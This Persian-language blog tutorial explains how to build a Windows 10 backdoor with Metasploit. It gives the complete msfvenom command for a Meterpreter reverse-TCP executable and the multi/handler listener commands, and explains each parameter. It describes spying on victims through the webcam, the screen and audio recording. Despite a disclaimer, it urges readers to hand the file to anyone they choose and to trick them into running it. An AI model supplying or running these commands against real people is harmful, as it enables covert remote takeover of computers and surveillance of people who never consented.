آموزشامنیتامنیت سایبریایراناینترنتتکنولوژیتلفن همراهحملات سایبریشبکه های اجتماعیکالی لینوکسلینوکسمقالههک
موضوعات داغ

بکدور چیست اموزش ساخت بکدور (BackDoor) برای ویندوز ۱۰

1398/6/19

به نام خدا

  بدافزارهای بکدور (Backdoor) برنامه‌هایی هستند که امکان دور زدن پروسه امنیتی یک

سیستم را به هکرها داده و منابع مختلفی از آن سیستم را از راه مربوطه در

اختیار نفوذگران قرار می دهند.

بکدور

 هکرها می توانند با استفاده از این روش بدون نیاز به اعتبار سنجی وارد سرور مورد نظر شده و از تغییر نام کاربری و رمز عبور سرور نگرانی نداشته باشند.

بک‌دورها اشکال مختلفی دارند که هکرها بنا بر اهداف خود از نفوذ به منابع یک سیستم از آنها استفاده می‌کنند.

در این آموزش شما با نحوه ساخت بکدور یا همون در پشتی در متااسپلویت برای ویندوز ۱۰ آشنا خواهید شد .

*(این آموزش جهت بالابردن سطح دانش شما میباشد و هر گونه سوء استفاده بر عهده خودتان هست)

با سایت بزرگ همراه یار همراه باشید

 اول در ترمینال لینوکس کد زیر را مینویسیم :

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST = 192.168.1.1 LPORT=4444 -o /root/Desktop/Backdoor.exe

تعریف اصطلاحات :


  • msfvenom : این دستور جایگزینی برای دستورات msfpayload و msfencode بود
  • از سال ۲۰۱۵ با ساخت کالی ورژن ۲٫۰ جایگزین این دو دستور شد
  • و کارش هم ساخت پیلود و اینکودر برای بکدور هستش .
  • p- : این پارامتر برای ساخت پیلود تحت یک پلت فرم مورد استفاده
  • قرار میگیره مثلا : ویندوز یا لینوکس خودش یا اندروید و …
  • Windows : پیلود برای این پلت فرم ساخته بشه .
  • meterpreter//reverse__tcp : این دستور برای اینه که بعد از اجرای بکدور توسط قربانی
  • به شما دسترسی ریموت شل میده و میتونید با پارامتر های
  • زیادی کار کنید . از جمله : دیدن وبکم و صفحه دسکتاپ قربانی و اسکرین شات از صفحه و ضبط صدا و …
  • platform– windows : فقط برای ویندوز باشه بکدور اجرایی که میسازیم .
  • a- : این پارامتر میاد encoder مورد نظر رو دریافت میکنه مثلا : x64 Or x86
  • f- : این پارامتر میاد برای ما فرمت فایل خروجی رو تعیین میکنه : مثلا اجرایی باشه یا …
  • LHOST : با این دستور میایم یه آیپی ست میکنیم که اطلاعات ارسالی از قربانی به این آی پی ارسال بشه .
  • LPORT : با این دستور میایم یه پورت ست میکنیم که اطلات ارسالی از قربانی با اسفتاده از این پورت دریافت بشه .
  • o- : این پارامتر برای ایجاد خروجی هستش که بعدش با پارامتر f- میایم اون خروجی رو بهش فرمت میدیم .
  • root//Desktop//Backdoor.exe : این محل دخیره فایل بکدور ما هستش که گفتیم تو مسیر روت // دسکتاپ // و با اسم بکدور ذخیره بشه .

خب بعد از ساخت ما باید یه لیسینر یا گوش دهنده بسازیم که بیاد برای ما به آی پی و پورتی که به بکدور دادیم گوش بده و اطلاعات رو برای ما دریافت کنه :

با تایپ دستور msfconsole در محیط ترمینال وارد متااسپلویت میشیم :

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit

توضیح اصطلاحات :


  • use exploit//multi//handler : این دستور میاد یه هندلر ایجاد میکنه .
  • set payload windows//meterpreter//reverse__tcp : این دستور میاد به گوش
  • هندلر میفهمونه که ما با استفاده از این پیلود میخایم ارتباط برقرار کنیم .
  • set LHOST : این دستور میاد آی پی که قبلا داخل ساخت بکدور استفاده
  • کرده بودیم رو ازمون میگیره تا به همون آی پی گوش بده .
  • set LPORT : این دستور هم میاد پورتی که قبلا داخل ساخت بکدور استفاده
  • کرده بودیم رو ازمون میگیره تا با استفاده از همون پورت اطلاعات رو بفرسته برامون .
  • exploit : این دستور هم در آخر سر میاد گوش دهنده رو در حالت اجرا میزاره تا وقتی که بکدور توسط قربانی اجرا بشه .

نکته : این آموزش فقط برای شبکه داخلی یا همون Lan هستش اگر میخاهید برای Wan یا همون شبکه جهانی باشه باید عملیات پورت فورواردینگ رو انجام بدید .

که داخل سایت آموزش پورت فورواردینگ رو بعدا آموزش میدم  .

چند نکته:

  • شما به جای اون IP که من وارد کردم آی پی لینوکس خودتون رو وارد کنید که آی پیتون رو با دستور ifconfig در محیط ترمینال لینوکس بدست خواهید آورد و اما پورت ۴۴۴۴ پورت پیشفرض متااسپلویت هستش که همین پورت باشه بهتره و دستش نزنید و فقط به تغییر اون آی پی بپردازید .
  • اون فایلی رو هم که ساخته شد به هر شخصی که دوست داشتید بدید .
  • اون فایلو چجوری بدید به طرف دیگه به هوش و زرنگی شما بستگی داره .

کانال تلگرام سایت همراه یار

برچسب ها

نوشته های مشابه

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا